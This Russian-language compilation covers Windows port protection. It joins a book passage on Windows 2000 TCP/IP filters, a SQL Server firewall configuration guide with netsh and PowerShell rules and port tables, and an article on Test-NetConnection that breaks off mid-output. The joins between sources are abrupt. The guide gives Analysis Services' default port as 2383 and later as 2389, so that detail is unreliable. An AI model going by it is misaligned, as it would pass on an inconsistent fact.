Имеет смысл также защитить порты, находящиеся в состоянии ожидания запросов, отдельных компьютеров. Такая "защита в глубину" значительно затрудняет возможность сетевых атак. Классический совет в этой связи сводится к завершению работы всех ненужных служб с помощью программы services.msc и их отключению. Особое внимание следует уделить котроллерам доменов под управлением Windows 2000: когда контроллеру домена делегируются права сервера (Server) или расширенного сервера (Advanced Server) с помощью команды dcpromo.exe, на нем автоматически устанавливаются служба активного каталога, DNS и сервер DHCP, а также открываются соответствующие порты. Контроллеры доменов – это важнейшие компоненты сети, поэтому они требуют особого обращения. Большинство приложений, файловые службы и службы печати лучше устанавливать на других компьютерах. Стремление к минимуму – первый принцип безопасности.

Чтобы ограничить доступ к портам отдельных компьютеров, можно использовать проверенные временем фильтры для протокола TCP/IP. Доступ к этим параметрам можно получить через вкладку Options диалогового окна, открываемого с помощью команды Network and Dial-up Connections › Properties › lnternet Protocol (TCP/IP) Properties › Advanced. Однако здесь сохранились старые недостатки. Фильтры протокола TCP/IP применяются сразу ко всем адаптерам. Их установка приведет к невозможности загрузки данных, инициированной даже легитимными соединениями, и сделает невозможным обычный просмотр Web-страниц в браузере системы. Кроме того, для корректного вступления в силу внесенных изменений требуется перегрузить систему.

Проведенное авторами тестирование Windows 2000 показало, что установка фильтров TCP/IP не блокирует эхо-пакетов ICMP (протокол 1), даже если отключить все протоколы IP, кроме 6 (TCP) и 17 (UDP).

sql-docs.ru-ru/configure-the-windows-firewall-to-allow-sql-server-access.md at live · MicrosoftDocs/sql-docs.ru-ru · GitHub

title description ms.custom ms.date ms.prod ms.reviewer ms.technology ms.topic helpviewer_keywords ms.assetid author ms.author ms.openlocfilehash ms.sourcegitcommit ms.translationtype ms.contentlocale ms.lasthandoff ms.locfileid

Настройка брандмауэра Windows

Узнайте, как настроить брандмауэр Windows, чтобы разрешить доступ к экземпляру SQL Server через брандмауэр.

contperf-fy21q3

04/07/2021

sql

install

conceptual

Windows Firewall ports

WMI firewall ports

Windows Firewall [Database Engine]

firewall systems, configuring

advfirewall

firewall systems

rules firewall

firewall systems, overview and port list

1433 TCP port

portopening using netsh

ports [SQL Server], TCP

netsh to open firewall ports

f55c6a0e-b6bd-4803-b51a-f3a419803024

cawrites

chadam

ca3e3ae4255fc1815e690ef633350b33e4725ed9

09122d02fc3d86c6028366653337c083da8a3f4c

HT

ru-RU

04/08/2021

107072436

[!INCLUDE SQL Server Windows Only - ASDBMI ]

Системы брандмауэров предотвращают несанкционированный доступ к ресурсам компьютера. Если брандмауэр включен, но настроен неправильно, попытка соединения с [!INCLUDEssNoVersion] может оказаться заблокированной.

Чтобы разрешить доступ к экземпляру [!INCLUDEssNoVersion] через брандмауэр, его необходимо настроить на компьютере, на котором работает [!INCLUDEssNoVersion]. Брандмауэр является компонентом [!INCLUDEmsCoName] Windows. Вместо него можно установить брандмауэр другой компании. В этой статье обсуждается настройка брандмауэра Windows, однако общие принципы применимы к любым другим брандмауэрам.

[!NOTE]
В статье содержатся общие сведения о настройке брандмауэра и сводные сведения, представляющие интерес для администратора [!INCLUDEssNoVersion]. Дополнительные сведения и официальные данные о брандмауэрах см. в документации по брандмауэру, например в разделе Руководство по безопасности для развертывания брандмауэра Windows.

Пользователи, знакомые с управлением брандмауэром Windows и знающие, какие параметры брандмауэра они хотят настроить, могут перейти напрямую к более сложным статьям:

Основные сведения о брандмауэрах

Брандмауэр проверяет входящие пакеты на соответствие следующему набору правил:

  • Если пакет соответствует стандартам, заданным правилами, то брандмауэр передает его протоколу TCP/IP для дальнейшей обработки.
  • Пакет не соответствует стандартам, заданным в правилах.
    • В этом случае брандмауэр отклоняет пакет. Если включено ведение журнала, в файле журнала брандмауэра создается соответствующая запись.

Список разрешенного трафика заполняется одним из следующих способов.

  • Автоматически. Когда защищенный брандмауэром компьютер инициирует соединение, брандмауэр добавляет в список запись, чтобы разрешить ответ. Ответ считается запрашиваемым трафиком, и ничего настраивать не требуется.

  • Вручную. Работа администратора заключается в настройке исключений в работе брандмауэра. Это открывает доступ к определенным программам или портам на вашем компьютере. В этом случае компьютер принимает весь входящий трафик, выполняя роль сервера, прослушивателя или однорангового узла. Настройку необходимо выполнить для подключения к [!INCLUDEssNoVersion].

Выбор стратегии брандмауэра является более сложной задачей и не сводится лишь к открытию или закрытию портов. При выборе стратегии брандмауэра для предприятия необходимо обязательно рассмотреть все доступные правила и параметры конфигурации. В этой статье не рассматриваются все возможные параметры брандмауэра. Рекомендуем ознакомиться со следующими документами:

Руководство по развертыванию брандмауэра Windows
Руководство по проектированию для брандмауэра Windows
Основные сведения об изоляции серверов и доменов

Параметры брандмауэра по умолчанию

Первым шагом при планировании конфигурации брандмауэра является определение его текущего состояния в операционной системе. Если операционная система была обновлена с предыдущей версии, в ней могли сохраниться старые настройки брандмауэра. Изменять параметры брандмауэра в домене может групповая политика или администратор.

[!NOTE]
Включение брандмауэра может повлиять на общий доступ к файлам и принтерам, подключения к удаленному рабочему столу и работу других программ, которым необходим доступ к компьютеру. Администратор должен просмотреть все приложения, которые работают на компьютере, прежде чем приступать к настройке параметров брандмауэра.

Программы для настройки брандмауэра

Настройте параметры брандмауэра Windows с помощью консоли управления (MMC) или netsh.

  • Консоль управления (MMC)

    Оснастка «Брандмауэр Windows в режиме повышенной безопасности» позволяет настраивать дополнительные параметры брандмауэра. Эта оснастка представляет большинство параметров брандмауэра и в удобной форме, а также все профили брандмауэра. Дополнительные сведения см. в разделе Использование оснастки "Брандмауэр Windows в режиме повышенной безопасности" далее в этой статье.

  • netsh

    Средство netsh.exe позволяет администратору настраивать и отслеживать компьютеры с Windows из командной строки или с помощью пакетного файла . При использовании средства netsh вводимые контекстные команды направляются соответствующим вспомогательным приложениям, которые их выполняют. Вспомогательное приложение — это файл библиотеки динамической компоновки (DLL) для расширения функциональных возможностей. Вспомогательное приложение обеспечивает настройку, мониторинг и поддержку различных служб, служебных программ и протоколов для средства netsh.

    Все операционные системы, поддерживающие [!INCLUDEssNoVersion] , имеют модуль поддержки брандмауэра. [!INCLUDEfirstref_longhorn] также содержит расширенный помощник брандмауэра advfirewall. Многие из описанных параметров конфигурации можно настроить с помощью средства netsh. Например, выполните в командной строке следующий скрипт, чтобы открыть TCP-порт 1433:

    netsh firewall set portopening protocol = TCP port = 1433 name = SQLPort mode = ENABLE scope = SUBNET profile = CURRENT  
    

    Аналогичный пример, использующий брандмауэр Windows для модуля поддержки повышенной безопасности:

    netsh advfirewall firewall add rule name = SQLPort dir = in protocol = tcp action = allow localport = 1433 remoteip = localsubnet profile = DOMAIN  
    

    Дополнительные сведения о средстве netsh см. в следующих разделах:

  • PowerShell

    В следующем примере показано, как открыть TCP-порт 1433 и UDP-порт 1434 для экземпляра по умолчанию SQL Server и службы обозревателя SQL Server:

    New-NetFirewallRule -DisplayName "SQLServer default instance" -Direction Inbound -LocalPort 1433 -Protocol TCP -Action Allow
    New-NetFirewallRule -DisplayName "SQLServer Browser service" -Direction Inbound -LocalPort 1434 -Protocol UDP -Action Allow

    Дополнительные примеры см. в разделе New-NetFirewallRule.

  • Для Linux. В Linux необходимо также открыть порты, связанные со службами, к которым вам нужен доступ. Различные дистрибутивы Linux и брандмауэры имеют свои процедуры. Примеры см. в руководствах по использованию SQL Server в Red Hat и SUSE.

Порты, используемые [!INCLUDEssNoVersion]

Следующие таблицы помогут выяснить, какие порты использует [!INCLUDEssNoVersion].

Ports Used By the Database Engine

По умолчанию приведены типичные порты, используемые службами SQL Server и связанными службами ядра СУБД. TCP 1433, 4022, 135, 1434, UDP 1434. В таблице ниже эти порты описаны подробно. Именованный экземпляр использует динамические порты.

В следующей таблице перечислены порты, обычно используемые компонентом [!INCLUDEssDE].

Сценарий Порт Комментарии
Экземпляр по умолчанию, работающий по протоколу TCP TCP-порт 1433 Этот порт открывают в брандмауэре чаще всего. Он применяется для программных соединений с экземпляром компонента [!INCLUDEssDE]по умолчанию или именованным экземпляром, который является единственным на данном компьютере (для именованных экземпляров следует учитывать ряд особых требований, подробнее о которых см. в разделе Динамические порты далее в этой статье).
Именованные экземпляры с портом по умолчанию TCP-порт выделяется динамически в момент запуска компонента [!INCLUDEssDE] . См. подраздел Динамические портыдалее в этом разделе. При использовании именованных экземпляров службе обозревателя [!INCLUDEssNoVersion] может потребоваться UDP-порт 1434.
Именованные экземпляры с фиксированным портом Номер порта настраивается администратором. См. подраздел Динамические портыдалее в этом разделе.
Выделенное административное соединение TCP-порт 1434 предназначен для экземпляра по умолчанию. Другие порты используются для именованных экземпляров. Номер порта проверьте по журналу ошибок. По умолчанию удаленные подключения по выделенному административному соединению (DAC) не активированы. Разрешить удаленное выделенное административное соединение можно при помощи средства настройки контактной зоны. Дополнительные сведения см. в разделе Surface Area Configuration.
[!INCLUDEssNoVersion] Служба браузера UDP-порт 1434 Служба обозревателя [!INCLUDEssNoVersion] ожидает передачи данных с входящих подключений к именованному экземпляру.
Служба предоставляет клиенту номер TCP-порта, соответствующий этому именованному экземпляру. Обычно служба « [!INCLUDEssNoVersion] , браузер» запускается при использовании именованного экземпляра компонента [!INCLUDEssDE] . Если клиент настроен на подключение к конкретному порту именованного экземпляра, служба обозревателя [!INCLUDEssNoVersion] не требуется.
Экземпляр с конечной точкой HTTP. Может указываться во время создания конечной точки HTTP. По умолчанию используется TCP-порт 80 для данных CLEAR_PORT и порт 443 для данных SSL_PORT. Используется для HTTP-соединения по URL-адресу.
Экземпляр по умолчанию с конечной точкой HTTPS. TCP-порт 443 Используется для HTTPS-соединения по URL-адресу. HTTPS — это HTTP-соединение, которое использует протокол TLS, ранее называемый SSL.
[!INCLUDEssSB] TCP-порт 4022. Чтобы проверить используемый порт, выполните следующий запрос:

SELECT name, protocol_desc, port, state_desc

FROM sys. tcp_endpoints

WHERE type_desc = 'SERVICE_BROKER'

Для компонента [!INCLUDEssNoVersion][!INCLUDEssSB] порт по умолчанию отсутствует. В примерах электронной документации используется стандартная конфигурация.
Зеркальное отображение базы данных Порт, выбранный администратором. Чтобы определить порт, выполните следующий запрос.

SELECT name, protocol_desc, port, state_desc FROM sys.tcp_endpoints

WHERE type_desc = 'DATABASE_MIRRORING'

Для зеркального отображения базы данных порт по умолчанию отсутствует, однако в примерах электронной документации используется TCP-порт 5022 или 7022. Важно избегать прерывания работы используемой конечной точки зеркального отображения, особенно в режиме высокого уровня безопасности с автоматической отработкой отказа. Конфигурация брандмауэра должна избегать прерывания кворума. Дополнительные сведения см. в разделе Указание сетевого адреса сервера (зеркальное отображение базы данных).
Репликация Соединения репликации с [!INCLUDEssNoVersion] используют порты, которые обычно использует компонент [!INCLUDEssDE] (TCP-порт 1433 для экземпляра по умолчанию).

Веб-синхронизация и доступ через FTP/UNC для моментального снимка репликации требуют открытия в брандмауэре дополнительных портов. Передачу начальных данных и схемы из одного места в другое репликация осуществляет по протоколу FTP (TCP-порт 21) либо с помощью синхронизации через HTTP (TCP-порт 80) или общего доступа к файлам. Для общего доступа к файлам применяются UDP-порты 137 и 138, а также TCP-порт 139 при использовании совместно с NetBIOS. Совместное использование файлов использует TCP-порт 445.

Для синхронизации по протоколу HTTP в репликации используется конечная точка служб IIS (настраиваемая, по умолчанию — порт 80), однако процесс IIS подключается к внутреннему интерфейсу [!INCLUDEssNoVersion] через стандартные порты (1433 для экземпляра по умолчанию).

При веб-синхронизации через FTP-порт передача данных выполняется между службами IIS и издателем [!INCLUDEssNoVersion] , а не между подписчиком и службами IIS.

[!INCLUDEtsql] отладчик TCP-порт 135

См. раздел Особые замечания относительно порта 135

Также может потребоваться исключение IPsec .

При использовании среды [!INCLUDEvsprvs]на [!INCLUDEvsprvs] главном компьютере в список исключений необходимо также добавить программу Devenv.exe и открыть TCP-порт 135.

При использовании среды [!INCLUDEssManStudio]на [!INCLUDEssManStudio] главном компьютере необходимо также добавить в список исключений программу ssms.exe и открыть TCP-порт 135. Дополнительные сведения см. в разделе Настройка правил брандмауэра перед запуском отладчика TSQL.

Пошаговые инструкции по настройке брандмауэра Windows для [!INCLUDEssDE] см. в разделе Настройка брандмауэра Windows для доступа к компоненту Database Engine.

Динамические порты

По умолчанию именованные экземпляры (включая [!INCLUDEssExpress]) используют динамические порты. Это означает, что при каждом запуске компонент [!INCLUDEssDE] находит доступный порт и использует его номер. Если именованный экземпляр является единственным установленным экземпляром компонента [!INCLUDEssDE] , то, скорее всего, он будет использовать TCP-порт 1433. При установке других экземпляров компонента [!INCLUDEssDE] они будут использовать другие TCP-порты. Поскольку выбираемый порт при каждом запуске компонента [!INCLUDEssDE] может меняться, трудно настроить брандмауэр на разрешение доступа к нужному порту. Если используется брандмауэр, рекомендуем перенастроить компонент [!INCLUDEssDE] на постоянное использование одного и того же порта. Рекомендуется использовать фиксированный или статический порт. Дополнительные сведения см. в разделе Настройка сервера для прослушивания указанного TCP-порта (диспетчер конфигурации SQL Server).

В качестве альтернативы настройке именованного экземпляра для прослушивания фиксированного порта можно создать в брандмауэре исключение для программы [!INCLUDEssNoVersion], например sqlservr.exe (для компонента [!INCLUDEssDE]). Номер порта не будет отображаться в столбце Локальный порт на странице Правила для входящего трафика при использовании оснастки MMC "Брандмауэр Windows в режиме повышенной безопасности". Аудит открытых портов может быть сложной задачей. Также нужно учитывать, что простой или накопительный пакет обновления может изменить путь к исполняемому файлу [!INCLUDEssNoVersion], что сделает правило брандмауэра недействительным.

Добавление в брандмауэр исключения для программы при помощи элемента "Брандмауэр Защитника Windows в режиме повышенной безопасности"
  1. В меню "Пуск" наберите wf.msc. Нажмите клавишу ВВОД или выберите результат поиска "wf.msc", чтобы открыть Брандмауэр Защитника Windows в режиме повышенной безопасности.

  2. В левой панели щелкните Правила для входящих подключений.

  3. В правой панели в разделе Действия нажмите кнопку Создать правило... . Откроется мастер создания правила для нового входящего подключения.

  4. В разделе Тип правила выберите Программа. Выберите Далее.

  5. В разделе Программа выберите Путь к программе. Нажмите кнопку Обзор и найдите файл программы SQL Server. Этот файл называется sqlservr.exe. Обычно он находится здесь:

    C:\Program Files\Microsoft SQL Server\MSSQL15.<InstanceName>\MSSQL\Binn\sqlservr.exe

    Выберите Далее.

  6. В разделе Действие выберите вариант Разрешить подключение. Выберите Далее.

  7. В разделе Профиль включите все три профиля. Выберите Далее.

  8. В поле Имя введите имя правила. Нажмите кнопку Готово.

Дополнительные сведения о конечных точках см. в разделах Настройка ядра СУБД на прослушивание нескольких портов TCP и Представления каталога конечных точек (Transact-SQL).

Порты, используемые службами Analysis Services

По умолчанию типичные порты, используемые SQL Server Analysis Services и связанными службами, — это: TCP 2382, 2383, 80, 443. В таблице ниже эти порты описаны подробно.

В следующей таблице перечислены порты, обычно используемые службами [!INCLUDEssASnoversion].

Компонент Порт Комментарии
[!INCLUDEssASnoversion] TCP-порт 2383 для экземпляра по умолчанию Стандартный порт для экземпляра служб [!INCLUDEssASnoversion]по умолчанию.
[!INCLUDEssNoVersion] Служба браузера Для именованного экземпляра служб [!INCLUDEssASnoversion] необходим только TCP-порт 2382 Запросы клиентов на подключение к именованному экземпляру [!INCLUDEssASnoversion], в которых не указан номер порта, направляются на порт 2382, на котором ожидает передачи данных служба обозревателя [!INCLUDEssNoVersion]. [!INCLUDEssNoVersion] затем перенаправляет запрос на порт, используемый запрошенным именованным экземпляром.
[!INCLUDEssASnoversion] настроены для работы через протокол IIS/HTTP

(служба PivotTable® Service использует протокол HTTP или HTTPS)

TCP-порт 80 Используется для HTTP-соединения по URL-адресу.
[!INCLUDEssASnoversion] настроены для работы через протокол IIS/HTTPS

(служба PivotTable® Service использует протокол HTTP или HTTPS)

TCP-порт 443 Используется для HTTPS-соединения по URL-адресу. HTTPS представляет собой HTTP-соединение, защищенное по протоколу TSL.

Если пользователи обращаются к [!INCLUDEssASnoversion] через IIS и Интернет, необходимо открыть порт, где IIS ожидает передачи данных. Затем нужно указать порт в строке подключения клиента. В этом случае необязательно иметь открытые порты для прямого доступа к службам [!INCLUDEssASnoversion]. Необходимо ограничить доступ к порту по умолчанию 2389, порту 2382 и другим портам, доступ к которым не требуется.

Пошаговые инструкции по настройке брандмауэра Windows для [!INCLUDEssASnoversion] см. в разделе Настройка брандмауэра Windows на разрешение доступа к службам Analysis Services.

Порты, используемые службами Reporting Services

По умолчанию SQL Server Reporting Services и связанные службы обычно используют порты TCP 80 и 443. В таблице ниже эти порты описаны подробно.

В следующей таблице перечислены порты, обычно используемые службами [!INCLUDEssRSnoversion].

Компонент Порт Комментарии
[!INCLUDEssRSnoversion] Веб-службы TCP-порт 80 Используется для HTTP-соединения со службами [!INCLUDEssRSnoversion] по URL-адресу. Не рекомендуется использовать предварительно настроенное правило Службы Интернета (HTTP) . Дополнительные сведения см. в разделе Взаимодействие с другими правилами брандмауэра ниже.
[!INCLUDEssRSnoversion] настроены для работы через протокол HTTPS TCP-порт 443 Используется для HTTPS-соединения по URL-адресу. HTTPS представляет собой HTTP-соединение, защищенное по протоколу TSL. Не рекомендуется использовать предварительно настроенное правило Защищенные службы Интернета (HTTP) . Дополнительные сведения см. в разделе Взаимодействие с другими правилами брандмауэра ниже.

Для соединения служб [!INCLUDEssRSnoversion] с экземпляром компонента [!INCLUDEssDE] или служб [!INCLUDEssASnoversion]необходимо также открыть соответствующие порты для этих служб. Пошаговые инструкции по настройке брандмауэра Windows для компонента [!INCLUDEssRSnoversion]см. в разделе Настройка брандмауэра для доступа к серверу отчетов.

Порты, используемые службами Integration Services

В следующей таблице перечислены порты, используемые службой [!INCLUDEssISnoversion] .

Компонент Порт Комментарии
[!INCLUDEmsCoName] удаленные вызовы процедур (MS RPC)

Используется средой выполнения служб [!INCLUDEssISnoversion] .

TCP-порт 135

См. раздел Особые замечания относительно порта 135

Служба [!INCLUDEssISnoversion] обращается к DCOM по порту 135. Диспетчер служб использует порт 135 для запуска и остановки службы [!INCLUDEssISnoversion], передачи работающей службе запросов управления и для других задач. Номер порта не может быть изменен.

Этот порт должен быть открыт только при подключении к удаленному экземпляру службы [!INCLUDEssISnoversion] из среды [!INCLUDEssManStudio] или пользовательского приложения.

Пошаговые инструкции по настройке брандмауэра Windows для служб [!INCLUDEssISnoversion] см. в статье Службы Integration Services (службы SSIS).

Другие порты и службы

В следующей таблице перечислены порты и службы, от которых может зависеть [!INCLUDEssNoVersion] .

Сценарий Порт Комментарии
Инструментарий управления Windows (WMI)

Дополнительные сведения об инструментарии управления Windows (WMI) см. в разделе основных принципов поставщика WMI для управления конфигурацией.

Инструментарий WMI запускается в составе общего узла службы с назначением портов через DCOM. Инструментарий WMI может пользовать TCP-порт 135.

См. раздел Особые замечания относительно порта 135

[!INCLUDEssNoVersion] использует инструментарий WMI для просмотра и управления службами. Рекомендуется использовать стандартную группу правил Инструментарий управления Windows (WMI) . Дополнительные сведения см. в разделе Взаимодействие с другими правилами брандмауэра ниже.
[!INCLUDEmsCoName] Координатор распределенных транзакций (Майкрософт) (MS DTC) TCP-порт 135

См. раздел Особые замечания относительно порта 135

Если приложение использует распределенные транзакции, то может потребоваться настройка брандмауэра таким образом, чтобы разрешить передачу данных координатора распределенных транзакций ([!INCLUDEmsCoName]) (MS DTC) между отдельными экземплярами MS DTC и между MS DTC и диспетчерами ресурсов (например, [!INCLUDEssNoVersion]). Рекомендуется использовать стандартную группу правил Координатор распределенных транзакций .

Если для всего кластера настроен единственный общий координатор MS DTC в отдельной группе ресурсов, следует добавить программу sqlservr.exe в список исключений брандмауэра.

Кнопка обзора в среде [!INCLUDEssManStudio] соединяется со службой [!INCLUDEssNoVersion], браузер по протоколу UDP. Дополнительные сведения см. в разделе Служба обозревателя SQL Server (ядро СУБД и SSAS). UDP-порт 1434 Протокол UDP не сохраняет соединения.

Свойство UnicastResponsesToMulticastBroadcastDisabled интерфейса INetFwProfile управляет работой брандмауэра и одноадресными ответами на широковещательные (или многоадресные) UDP-запросы. Возможны два варианта.

Если этот параметр имеет значение TRUE, то одноадресные ответы на широковещательные запросы запрещены. Перечисление служб завершится ошибкой.

Если этот параметр имеет значение FALSE (по умолчанию), то одноадресные ответы разрешены в течение 3 секунд. Эта длительность не настраивается. Если сеть переполнена, каналы имеют задержки или сервер работает в режиме высокой нагрузки, то при построении списка экземпляров [!INCLUDEssNoVersion] список может быть возвращен лишь частично и ввести пользователя в заблуждение.

Трафик по протоколу IPsec UDP-порты 500 и 4500 Если политика домена требует выполнения сетевых соединения через протокол IPsec, необходимо добавить в список исключений UDP-порты 4500 и 500. Протокол IPsec можно включить с помощью мастера создания правила для входящего подключения в оснастке "Брандмауэр Windows". Дополнительные сведения см. в разделе Использование оснастки "Брандмауэр Windows в режиме повышенной безопасности" ниже.
Использование проверки подлинности Windows в надежных доменах Брандмауэр можно настроить для разрешения запросов проверки подлинности. Дополнительные сведения см. в разделе Настройка брандмауэра для работы с доменами и отношениями доверия.
[!INCLUDEssNoVersion] и кластеризация Windows Для кластеризации требуется открыть дополнительные порты, не связанные с [!INCLUDEssNoVersion] напрямую. Дополнительные сведения см. в разделе Подготовка сети для работы кластера.
Пространства имен URL-адресов, зарезервированные в компоненте HTTP.SYS Обычно TCP-порт 80, однако можно настроить для использования любого другого порта. Общие сведения см. в разделе Настройка протоколов HTTP и HTTPS. Сведения о резервировании конечной точки компонента HTTP.SYS с помощью программы HttpCfg.exe, относящиеся к [!INCLUDEssNoVersion], см. в разделе Сведения о резервировании и регистрации URL-адресов (диспетчер конфигурации служб SSRS).

Особые замечания относительно порта 135

При использовании RPC с транспортным протоколом TCP/IP или UDP/IP входящие порты динамически назначаются системным службам по мере надобности. Используются порты TCP/IP и UDP/IP с номерами выше 1024. Эти порты называются "случайными RPC-портами". В этом случае RPC-клиент определяет порт, назначенный серверу, через модуль конечной точки RPC. Для некоторых служб, работающих через протокол RPC, можно настроить использование определенного фиксированного порта. Можно также ограничить диапазон портов, динамически назначаемых RPC и не зависящих от службы. Поскольку порт 135 используется для многих служб, он часто подвергается атакам злоумышленников. В случае открытия порта 135 рекомендуется ограничить область действия правила брандмауэра.

Дополнительные сведения о порте 135 см. в следующих ресурсах.

Взаимодействие с другими правилами брандмауэра

Настройка брандмауэра Windows производится на основе правил и групп правил. Каждое правило или группа правил связывается с определенной программой или службой, которая может изменять или удалять это правило без вашего ведома. Например, группы правил Службы Интернета (HTTP) и Защищенные службы Интернета (HTTPS) связаны со службами IIS. При включении этих правил будут открыты порты 80 и 443 и разрешены функции [!INCLUDEssNoVersion] , зависящие от этих портов. Однако администратор в процессе настройки служб IIS может изменить или отключить эти правила. Если вы используете для [!INCLUDEssNoVersion] порт 80 или 443, создайте собственное правило или группу правил для поддержки необходимой конфигурации портов независимо от других правил IIS.

Оснастка «Брандмауэр Windows в режиме повышенной безопасности» пропускает весь трафик, соответствующий применимым разрешающим правилам. Таким образом, если существуют два правила для порта 80 (с разными параметрами), то будет пропускаться трафик, соответствующий любому из них. Например, если одно правило разрешает трафик по порту 80 из локальной подсети, а другое разрешает трафик с любого адреса, то в итоге на порту 80 будет разрешен любой трафик независимо от источника. Чтобы обеспечить эффективное управление доступом к [!INCLUDEssNoVersion], администратор должен периодически проверять все правила брандмауэра, разрешенные на сервере.

Общие сведения о профилях брандмауэра

В соответствии с профилями брандмауэра операционная система определяет и запоминает каждую из сетей по следующим параметрам: возможность подключения, имеющиеся подключения и категория.

Брандмауэр Windows в режиме повышенной безопасности делит сети на три типа.

  • Домен. Windows может выполнить проверку подлинности доступа к контроллеру домена, в который включен компьютер.
  • Общедоступные. В эту категорию первоначально попадают все сети, не входящие в домены. Сети, которые представляют прямые соединения с Интернетом, являются открытыми (аэропорты, кафе и другие места открытого доступа).
  • Частные. Сеть, определенная пользователем или приложением как личная. Только доверенные сети могут быть определены как частные. Обычно в качестве частной сети определяется сеть малого предприятия, домашняя сеть и т. п.

Администратор может создать профиль для каждого типа сети и задать для этих профилей разные политики брандмауэра. Одномоментно применим только один профиль. Профили применяются в следующем порядке.

  1. Профиль домена применяется, когда все интерфейсы проходят проверку подлинности на контроллере домена, членом которого является компьютер.
  2. Если все интерфейсы либо прошли проверку подлинности к контроллеру домена, либо соединены с сетями, которые определены как частные, применяется частный профиль.
  3. В противном случае применяется открытый профиль.

Просмотреть и настроить профили брандмауэра можно с помощью оснастки «Брандмауэр Windows в режиме повышенной безопасности». Элемент Брандмауэр Windows на панели управления позволяет настраивать только текущий профиль.

Дополнительные параметры брандмауэра в элементе «Брандмауэр Windows» на панели управления

Добавление брандмауэра позволяет блокировать открытие порта для входящих подключений с определенных компьютеров или из локальной подсети. Ограничьте область открытия портов, чтобы сделать компьютер менее уязвимым для злоумышленников.

[!NOTE]
Элемент Брандмауэр Windows на панели управления позволяет настроить только текущий профиль.

Изменение области действия исключения брандмауэра с помощью «Брандмауэра Windows» на панели управления

  1. В панели управления в элементе Брандмауэр Windows выберите на вкладке Исключения программу или порт, а затем нажмите Свойства или Изменить.

  2. В диалоговом окне Изменение программы или Изменение порта нажмите Изменить область.

  3. Выберите один из следующих вариантов.

    • Любой компьютер (включая компьютеры в Интернете) : не рекомендуется. В этом случае любой компьютер, способный обращаться к вашему, сможет подключаться к указанной программе или порту. Этот параметр может пригодиться для передачи данных анонимным пользователям Интернета, однако он повышает уязвимость компьютера. Уязвимость повысится, если одновременно с этим параметром разрешить обход с использованием преобразования сетевых адресов (NAT), например с помощью параметра "Разрешить обход узлов".

    • Только моя сеть (подсеть) : это более безопасный вариант по сравнению с режимом Любой компьютер. Только компьютеры локальной подсети могут производить соединение с программой или портом.

    • Особый список. Соединение разрешено только компьютерам, имеющим перечисленные здесь IP-адреса. Этот режим может быть более безопасным по сравнению с вариантом Только моя сеть (подсеть) , однако клиентские компьютеры, использующие протокол DHCP, могут иногда менять IP-адреса, что приводит к невозможности подключения. При этом другой компьютер, которому не предоставлялся доступ, может принять указанный в списке IP-адрес и подключиться к нему. Вариант Настраиваемый список подходит для получения списков других серверов, для которых настроены фиксированные IP-адреса. IP-адреса могут быть подделаны злоумышленником. Эффект ограничения правил брандмауэра напрямую зависит от уровня защиты сетевой инфраструктуры.

Использование оснастки «Брандмауэр Windows в режиме повышенной безопасности»

Оснастка MMC "Брандмауэр Windows в режиме повышенной безопасности" позволяет настроить расширенные параметры брандмауэра. Эта оснастка включает мастер настройки правил и позволяет изменять параметры, недоступные в элементе Брандмауэр Windows из панели управления. Эти параметры включают:

  • Параметры шифрования.
  • Ограничения служб.
  • Ограничение соединений для компьютеров по именам.
  • Ограничение соединений для определенных пользователей или профилей.
  • Разрешение просмотра узлов для исключения маршрутизаторов NAT.
  • Настройка правил исходящих соединений.
  • Настройка правил безопасности.
  • Требование протокола IPsec для входящих соединений.

Создание правила брандмауэра при помощи мастера создания правил

  1. В меню "Пуск" выберите пункт Выполнить, введите WF.msc и нажмите кнопку ОК.
  2. В левой части панели Брандмауэр Windows в режиме повышенной безопасности щелкните правой кнопкой мыши элемент Правила для входящих подключений и выберите пункт Создать правило.
  3. Завершите мастер создания правила для нового входящего подключения , задав все необходимые параметры.

Устранение неполадок настройки брандмауэра

Следующие средства и методы могут оказаться полезными при устранении неполадок брандмауэра.

  • Действующее состояние порта является объединением всех правил, связанных с этим портом. Чтобы заблокировать доступ к порту, бывает полезно просмотреть все правила, в которых он упоминается. Просмотрите правила с помощью оснастки MMC "Брандмауэр Windows в режиме повышенной безопасности" и отсортируйте правила для входящего и исходящего трафика по номеру порта.

  • Просмотрите порты, которые активны на компьютере, где запущен [!INCLUDEssNoVersion] . В процессе анализа необходимо проверить, на каких портах TCP/IP ожидается передача данных, а также проверить состояние этих портов.

    Для определения, на каких портах ожидается передача данных, отобразите активные TCP-подключения и статистику IP-адресов, используя программу командной строки netstat.

    Получение списка прослушиваемых TCP/IP-портов
    1. Откройте окно командной строки.

    2. В командной строке введите netstat -n -a.

      При наличии параметра -n служебная программа netstat выводит адреса и номера портов активных подключений TCP в числовом виде. При наличии параметра -a служебная программа netstat выводит порты TCP и UDP, которые прослушиваются компьютером.

  • Служебную программу PortQry можно использовать для вывода состояния портов TCP/IP (прослушивается, не прослушивается, фильтруется). Если порт фильтруется, служебная программа может не получить от него ответ. Скачать PortQry можно в Центре загрузки Майкрософт.

См. также:

Общие сведения о службе и требования к сетевым портам в системе Windows Server
Руководство. Настройка параметров брандмауэра (база данных SQL Microsoft Azure)

Test-NetConnection: проверка открытых/закрытых TCP портов из PowerShell

В PowerShell 4. 0 (Windows 2012 R2, Windows 8.1 и выше) появился встроенный командлет для проверки сетевых соединений — Test-NetConnection. С помощью данного командлета вы можете проверить доступность удаленного сервера или сетевой службы на нем, блокировку TCP портов файерволами, проверить доступность по ICMP и маршрутизацию. По сути, командлет Test-NetConnection позволяет заменить сразу несколько привычных сетевых утилит: ping, traceroute, сканер TCP портов и т.д.

Любому администратору периодически приходится проверять доступность службы на удаленном сервере путем проверки ответа от удаленного TCP порта (например, доступность почтового или веб сервера). Причем, все привыкли, что такую проверку быстрее всего выполнить с помощью команды telnet. Например, для проверки доступности SMTP службы на почтовом сервере (по умолчанию он отвечает на 25 TCP порту) достаточно выполнить команду telnet msk-msg01.winitpro.ru 25. Но начиная с Windows 7 клиент telnet выделен в отдельный компонент, который нужно устанавливать отдельно. Посмотрим, как выполнить аналогичное действие в PowerShell.

Основное преимущество командлета Test-NetConnection – он уже входит в состав всех современных версий Windows и вам не нужно устанавливать его отдельно. Командлет входит в состав модуля NetTCPIP (начиная с PoSh v4.0).

TCP Port Ping: Использование Test-NetConnection для проверки открытых портов и доступности серверов

Проверим, открыт ли порт TCP 25 (SMTP протокол) на почтовом сервере с помощью Test-NetConnection:

Test-NetConnection -ComputerName msk-msg01 -Port 25

Примечание. С помощью командлета Test-NetConnection можно проверить только TCP соединение, для проверки доступности UDP портов он не применим.

В сокращенном виде аналогичная команда выглядит так:

TNC msk-mail1 -Port 25

Разберем результат команды:

ComputerName           : msk-msg01
